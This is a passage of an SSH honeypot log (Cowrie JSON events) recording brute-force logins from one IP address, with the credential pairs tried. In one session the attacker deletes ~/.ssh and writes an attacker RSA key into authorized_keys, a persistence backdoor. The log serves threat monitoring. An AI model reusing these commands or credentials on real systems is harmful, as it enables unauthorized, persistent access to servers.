ha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:31.203775Z","src_ip":"212.227.235.229","session":"f0bbbfa41274"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:31.672910Z","src_ip":"212.227.235.229","session":"f0bbbfa41274"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:32.782228Z","src_ip":"212.227.235.229","session":"f0bbbfa41274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57664,"dst_ip":"1.2.3.4","dst_port":22,"session":"8921e3b5a871","protocol":"ssh","message":"New connection: 212.227.235.229:57664 (1.2.3.4:22) [session: 8921e3b5a871]","sensor":"my-vps","timestamp":"2025-09-09T01:33:32.889044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:32.889806Z","src_ip":"212.227.235.229","session":"8921e3b5a871"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:32.997341Z","src_ip":"212.227.235.229","session":"8921e3b5a871"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:33:33.467902Z","src_ip":"212.227.235.229","session":"8921e3b5a871"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:33.576932Z","src_ip":"212.227.235.229","session":"8921e3b5a871"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:33.577837Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45214,"dst_ip":"1.2.3.4","dst_port":22,"session":"b033c78894ed","protocol":"ssh","message":"New connection: 212.227.235.229:45214 (1.2.3.4:22) [session: b033c78894ed]","sensor":"my-vps","timestamp":"2025-09-09T01:33:49.789144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:49.791479Z","src_ip":"212.227.235.229","session":"b033c78894ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:50.054004Z","src_ip":"212.227.235.229","session":"b033c78894ed"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:51.142891Z","src_ip":"212.227.235.229","session":"b033c78894ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50584,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8bf93fd5ebc","protocol":"ssh","message":"New connection: 212.227.235.229:50584 (1.2.3.4:22) [session: d8bf93fd5ebc]","sensor":"my-vps","timestamp":"2025-09-09T01:33:51.420745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:51.422626Z","src_ip":"212.227.235.229","session":"d8bf93fd5ebc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:51.658544Z","src_ip":"212.227.235.229","session":"d8bf93fd5ebc"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:52.406470Z","src_ip":"212.227.235.229","session":"b033c78894ed"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:52.610932Z","src_ip":"212.227.235.229","session":"d8bf93fd5ebc"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:53.850867Z","src_ip":"212.227.235.229","session":"d8bf93fd5ebc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36818,"dst_ip":"1.2.3.4","dst_port":22,"session":"659cf7aa62c4","protocol":"ssh","message":"New connection: 212.227.235.229:36818 (1.2.3.4:22) [session: 659cf7aa62c4]","sensor":"my-vps","timestamp":"2025-09-09T01:33:54.043833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:54.044811Z","src_ip":"212.227.235.229","session":"659cf7aa62c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:54.163521Z","src_ip":"212.227.235.229","session":"659cf7aa62c4"}
{"eventid":"cowrie.login.failed","username":"test2","password":"111","message":"login attempt [test2/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:54.678511Z","src_ip":"212.227.235.229","session":"659cf7aa62c4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:55.799751Z","src_ip":"212.227.235.229","session":"659cf7aa62c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45718,"dst_ip":"1.2.3.4","dst_port":22,"session":"77c124c4e812","protocol":"ssh","message":"New connection: 212.227.235.229:45718 (1.2.3.4:22) [session: 77c124c4e812]","sensor":"my-vps","timestamp":"2025-09-09T01:34:06.423147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:06.423985Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:06.665185Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:34:07.671563Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:34:08.174940Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.175630Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.176669Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.418540Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51636,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf0c500d5d91","protocol":"ssh","message":"New connection: 212.227.235.229:51636 (1.2.3.4:22) [session: cf0c500d5d91]","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.568605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.569321Z","src_ip":"212.227.235.229","session":"cf0c500d5d91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.820278Z","src_ip":"212.227.235.229","session":"cf0c500d5d91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:34:08.996726Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:34:08.997388Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:34:09.240604Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:09.241505Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45724,"dst_ip":"1.2.3.4","dst_port":22,"session":"646ec04cb0e9","protocol":"ssh","message":"New connection: 212.227.235.229:45724 (1.2.3.4:22) [session: 646ec04cb0e9]","sensor":"my-vps","timestamp":"2025-09-09T01:34:09.481416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:09.482245Z","src_ip":"212.227.235.229","session":"646ec04cb0e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:09.723660Z","src_ip":"212.227.235.229","session":"646ec04cb0e9"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:34:09.861113Z","src_ip":"212.227.235.229","session":"cf0c500d5d91"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:34:10.733522Z","src_ip":"212.227.235.229","session":"646ec04cb0e9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:11.112439Z","src_ip":"212.227.235.229","session":"cf0c500d5d91"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:11.976595Z","src_ip":"212.227.235.229","session":"646ec04cb0e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45740,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e21df8ca9cb","protocol":"ssh","message":"New connection: 212.227.235.229:45740 (1.2.3.4:22) [session: 5e21df8ca9cb]","sensor":"my-vps","timestamp":"2025-09-09T01:34:12.218304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:12.219671Z","src_ip":"212.227.235.229","session":"5e21df8ca9cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:12.461364Z","src_ip":"212.227.235.229","session":"5e21df8ca9cb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:34:13.428836Z","src_ip":"212.227.235.229","session":"5e21df8ca9cb"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:13.671181Z","src_ip":"212.227.235.229","session":"77c124c4e812"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:13.672267Z","src_ip":"212.227.235.229","session":"5e21df8ca9cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60676,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b7f51f8a3a0","protocol":"ssh","message":"New connection: 212.227.235.229:60676 (1.2.3.4:22) [session: 3b7f51f8a3a0]","sensor":"my-vps","timestamp":"2025-09-09T01:34:29.664926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:29.666326Z","src_ip":"212.227.235.229","session":"3b7f51f8a3a0"}
